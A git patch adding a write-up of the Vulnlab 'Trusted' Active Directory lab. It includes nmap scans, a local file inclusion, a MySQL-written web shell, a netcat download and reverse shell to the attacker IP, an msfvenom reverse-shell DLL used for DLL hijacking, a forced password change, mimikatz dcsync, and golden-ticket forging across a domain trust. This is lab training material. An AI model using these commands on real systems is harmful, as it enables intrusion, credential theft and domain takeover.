From 687731035dbdf2e24a4568560ed2f0a95125ed01 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Mon, 26 Jun 2023 23:30:13 +0500
Subject: [PATCH] Create Trusted.md
---
Vulnlab/Trusted.md | 380 +++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 380 insertions(+)
create mode 100644 Vulnlab/Trusted.md
diff --git a/Vulnlab/Trusted.md b/Vulnlab/Trusted.md
new file mode 100644
index 0000000..bc96ef1
--- /dev/null
+++ b/Vulnlab/Trusted.md
@@ -0,0 +1,380 @@
+# Vulnlab - Trusted
+
+# 10.10.212.5
+
+## NMAP
+
+```bash
+Nmap scan report for 10.10.212.5
+Host is up (0.097s latency).
+Not shown: 65509 closed tcp ports (reset)
+PORT STATE SERVICE VERSION
+53/tcp open domain Simple DNS Plus
+88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-19 17:35:47Z)
+135/tcp open msrpc Microsoft Windows RPC
+139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
+445/tcp open microsoft-ds?
+464/tcp open kpasswd5?
+593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+636/tcp open tcpwrapped
+3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
+3269/tcp open tcpwrapped
+3389/tcp open ms-wbt-server Microsoft Terminal Services
+|_ssl-date: 2023-06-19T17:37:17+00:00; +38s from scanner time.
+| ssl-cert: Subject: commonName=trusteddc.trusted.vl
+| Issuer: commonName=trusteddc.trusted.vl
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-04-21T14:47:57
+| Not valid after: 2023-10-21T14:47:57
+| MD5: 45ea20be5e4bca32c9fc20b0d2c3801a
+|_SHA-1: 46afd9e24c5f561f7de1089a8038b9f856db4b8a
+| rdp-ntlm-info:
+| Target_Name: TRUSTED
+| NetBIOS_Domain_Name: TRUSTED
+| NetBIOS_Computer_Name: TRUSTEDDC
+| DNS_Domain_Name: trusted.vl
+| DNS_Computer_Name: trusteddc.trusted.vl
+| Product_Version: 10.0.20348
+|_ System_Time: 2023-06-19T17:37:01+00:00
+5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-server-header: Microsoft-HTTPAPI/2.0
+|_http-title: Not Found
+9389/tcp open mc-nmf .NET Message Framing
+47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-title: Not Found
+|_http-server-header: Microsoft-HTTPAPI/2.0
+```
+
+# 10.10.212.6
+
+## NMAP
+
+```bash
+Nmap scan report for 10.10.212.6
+Host is up (0.088s latency).
+Not shown: 65508 closed tcp ports (reset)
+PORT STATE SERVICE VERSION
+53/tcp open domain Simple DNS Plus
+80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
+|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
+| http-title: Welcome to XAMPP
+|_Requested resource was http://10.10.212.6/dashboard/
+|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-19 17:35:53Z)
+135/tcp open msrpc Microsoft Windows RPC
+139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
+443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
+|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
+| http-title: Welcome to XAMPP
+|_Requested resource was https://10.10.212.6/dashboard/
+| tls-alpn:
+|_ http/1.1
+|_ssl-date: TLS randomness does not represent time
+| ssl-cert: Subject: commonName=localhost
+| Issuer: commonName=localhost
+| Public Key type: rsa
+| Public Key bits: 1024
+| Signature Algorithm: sha1WithRSAEncryption
+| Not valid before: 2009-11-10T23:48:47
+| Not valid after: 2019-11-08T23:48:47
+| MD5: a0a44cc99e84b26f9e639f9ed229dee0
+|_SHA-1: b0238c547a905bfa119c4e8baccaeacf36491ff6
+|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+445/tcp open microsoft-ds?
+464/tcp open kpasswd5?
+593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+636/tcp open tcpwrapped
+3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
+| mysql-info:
+| Protocol: 10
+|_ Auth Plugin Name: mysql_native_password
+3389/tcp open ms-wbt-server Microsoft Terminal Services
+|_ssl-date: 2023-06-19T17:37:17+00:00; +39s from scanner time.
+| rdp-ntlm-info:
+| Target_Name: LAB
+| NetBIOS_Domain_Name: LAB
+| NetBIOS_Computer_Name: LABDC
+| DNS_Domain_Name: lab.trusted.vl
+| DNS_Computer_Name: labdc.lab.trusted.vl
+| DNS_Tree_Name: trusted.vl
+| Product_Version: 10.0.20348
+|_ System_Time: 2023-06-19T17:37:03+00:00
+| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
+| Issuer: commonName=labdc.lab.trusted.vl
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-04-21T14:48:14
+| Not valid after: 2023-10-21T14:48:14
+| MD5: 6b0e83e111daedeaeec7494630f036f6
+|_SHA-1: 3b251ec4daa9f35d915589b7f6bb59fc071707c8
+5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-title: Not Found
+|_http-server-header: Microsoft-HTTPAPI/2.0
+```
+
+## PORT 445 (SMB)
+
+Performing null authentication on SMB didn't showed any shares as well
+
+
+
+## PORT 389 (LDAP)
+
+On ldap, performing null authentication didn't worked as well
+
+
+
+
+## PORT 80/443 (HTTP/HTTPS)
+
+The webserver had XAMPP running
+
+
+
+Fuzzing for files with gobuster it showed `/dev`
+
+
+
+
+
+On visiting any of the pages, it's going to take the html page name as a GET parameter `view`
+
+
+
+So here we can try Local File Inclusion (LFI) to see if any of the local files get included
+
+```bash
+http://10.10.212.6/dev/index.html?view=C:/WINDOWS/System32/drivers/etc/hosts
+```
+
+
+
+We can check the source of index.html file by using `php://filter` to encode the file contents in base64 as it might have php code which gets executed if it's in plain text
+
+
+
+
+
+At the bottom we can see why we were able to include local files, as it's using `include` on GET parameter and accepting files. secondly we see a comment for Eric which talks about setting up database connection, on trying to fuzz for php files, we get `db.php`
+
+
+
+From here we can get credentials to mysql
+
+
+
+
+With these credentials we can login to mysql
+
+
+
+With `news` database, we can query for `users` table
+
+
+
+Here we can find three usernames, out of which `rsmith`'s hash was cracked
+
+
+
+On trying to crack these hashes with Crackstation
+
+
+
+We can check if these credentials works on the target machine with `crackmapexec`
+
+
+
+Checking the shares, there's wasn't any interesting share
+
+
+
+## Un-Intended (SYSTEM)
+
+Going back to mysql, since we are root user, we may have file and write privilege, we can create a php file to execute system commands through GET parameter
+
+```mysql
+select "" INTO OUTFILE 'C:/xampp/htdocs/dev/shell.php';
+```
+
+
+
+
+
+Transferring `nc.exe` by setting up a python server to host the file
+
+```powershell
+curl http://10.8.0.136/nc64.exe -o C:/Windows/Temp/nc.exe
+```
+
+
+
+
+Now executing it while having our netcat listener ready
+
+```powershell
+C:/Windows/Temp/nc.exe 10.8.0.136 2222 -e cmd.exe
+```
+
+
+
+## Intended (ewalters)
+
+I wasn't able to run `python-bloodhound`, not sure what was the issue, since we have SYSTEM user on LABDC, I decided to enumerate `lab.trusted.vl` domain with sharphound.exe by downloading it through our python server
+
+
+
+We can then download this through evil-winrm, since we have the administrator hash from the dump
+
+
+
+Running bloodhound on the json files we got from sharphound, we can see a path from `rsmith` to `ewalters` by having `ForceChangePassword` ACL on ewalters, we can change the password and login by either WinRM or RDP since it has `CanPSRemote` permissions on the host
+
+
+
+Through `rpcclient`, ewalters's password can be changed
+
+```bash
+setuserinfo2 ewalters 23 'Ewwalter@123456'
+```
+
+
+
+With cme we can verify if the password is actually updated and we can login through WinRM
+
+
+
+
+
+In `C:/` drive, there was a folder `AVTest` which had `readme.txt` talking about Christine to run AV tools
+
+
+
+Using `smbserver.py` to transfer `KasperskyRemovalTool.exe`
+
+
+
+
+
+
+## Privilege Escalation (cpowers)
+
+Transferring the exe on windows machine and running `Process Monitor/Procmon` to analyze which DLL is being loaded by this exe, on launching procmon, it's going to capture all system events
+
+
+
+Running `KasperskyRemovalTool.exe` to make sure it's events gets logged
+
+
+
+Hit `ctrl+E` to stop capturing for system events and apply filters to only display kaspersky process
+
+
+
+First applying the filter for `KasperskyRemovalTool` process name
+
+
+
+Next adding the filter for the dll files
+
+
+
+Lastly for dlls which are not found, Here we'll see `KasperskyRemovalToolENU.dll`
+being loaded, so we need to create 32 bit DLL since the exe is in PE32 format
+
+
+
+
+
+```bash
+msfvenom -p windows/shell_reverse_tcp LHOST=10.8.0.136 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll
+```
+
+
+
+Transferring the dll file and putting it in `C:/AVTest` as the dll was being loaded from the same location from where the exe was being executed
+
+
+
+Now wait for few seconds for the exe to be triggered which will execute our malicious dll and we'll get a shell as `cpowers`
+
+
+
+This user was a member of `domain admin` , so we have complete access on the first machine
+
+
+
+## Privilege Escalation (Enterprise Admin)
+
+We can enumerate the trust between `labdc.trusted.vl` and `trusted.vl`
+
+```powershell
+([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
+
+nltest.exe /trusted_domains
+```
+
+
+
+Following this article, we can abuse this child->parent domain trust relationship and escalate to enterprise domain, in order to do this we need the krbtgt hash of lab.trusted.vl and the SIDs of both domains, then with mimikatz we can forge a golden ticket for the enterprise domain admin
+
+```powershell
+lsadump::dcsync /domain:lab.trusted.vl /all
+```
+
+Dumping ntds.dit to get the krbtgt hash by using `mimikatz`
+
+
+
+
+
+Getting the domain SID of lab.trusted.vl and trusted.vl by running `lsadump::trust /patch`
+
+
+
+Now forging a ticket for enterprise domain admin
+
+```powershell
+kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
+```
+
+
+
+All that is left is to dump ntds from trusted.vl domain
+
+```powershell
+lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all
+```
+
+
+
+
+
+Having the administrator's hash from trusted.vl, we can login through WinRM and complete this AD chain.
+
+
+
+Even tho we are administrator on the machine, the flag wasn't still readable as it was giving access denied
+
+
+
+Here I had to login as the administrator by changing his password and then grabbing the flag
+
+
+
+
+## References
+
+- https://github.com/aniqfakhrul/powerview.py
+- https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+- https://medium.com/techzap/dll-hijacking-part-1-basics-b6dfb8260cf1
+- https://redteamtechniques.github.io/Windows%20%26%20AD%20Hacking/Lab%20Attacks/Abusing%20Parent%20Child%20Domain%20Trusts%20for%20Privilege%20Escalation%20from%20DA%20to%20EA/
+